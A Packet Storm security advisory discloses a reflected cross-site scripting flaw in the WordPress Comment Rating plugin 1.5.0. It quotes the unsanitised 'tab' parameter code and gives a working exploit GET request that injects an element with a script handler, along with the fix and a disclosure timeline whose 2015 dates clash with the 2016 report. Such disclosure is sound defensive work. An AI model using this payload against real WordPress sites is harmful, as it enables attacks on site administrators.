WordPress Comment Rating 1.5.0 Cross Site Scripting

2016-01-30T00:00:00
ID PACKETSTORM:135520
Type packetstorm
Reporter Rahul Pratap Singh
Modified 2016-01-30T00:00:00

Description

                                        
                                            `## FULL DISCLOSURE  
  
  
#Product : wp-comment-rating  
#Exploit Author : Rahul Pratap Singh  
#Version : 1.5.0  
#Home page Link :  
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710  
#Website : 0x62626262.wordpress.com  
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94  
#Date : 30/Jan/2016  
  
XSS Vulnerability:  
  
----------------------------------------  
Description:  
----------------------------------------  
"tab" parameter is not sanitized that leads to Reflected XSS.  
  
----------------------------------------  
Vulnerable Code:  
----------------------------------------  
File Name: wpb_plugin_admin_page.php  
  
line:194  
$this->current_tab = isset( $_GET['tab'] ) ? $_GET['tab'] : '';  
  
line:553  
$active_tab = $this->current_tab;  
  
line:558  
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ?  
$this->tabs[0]->  
get_id() : $active_tab;  
  
line:561  
<div class="wrap wrap-<?php echo $this->page_hook . ' active-tab-' .  
$active_tab; ?>">  
  
----------------------------------------  
Exploit:  
----------------------------------------  
GET /wp-admin/edit-comments.php?page=wpcommentrating&tab=">  
< input type=text onclick=alert(/XSS/)><!--  
----------------------------------------  
  
POC:  
----------------------------------------  
https://0x62626262.files.wordpress.com/2016/01/wpcommentratingxsspoc1.png  
  
Fix:  
Update to 1.5.4  
  
Vulnerability Disclosure Timeline:  
→ January 24, 2015 – Bug discovered, initial report to Vendor  
→ January 25, 2015 – Vendor Acknowledged  
→ January 27, 2015 – Vendor Deployed a Patch  
  
#######################################  
# CTG SECURITY SOLUTIONS #  
# www.ctgsecuritysolutions.com  
<http://www.ctgsecuritysolutions.com/> #  
#######################################  
  
Pub Ref:  
https://0x62626262.wordpress.com/2016/01/30/wp-comment-rating-xss-vulnerability/  
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710  
`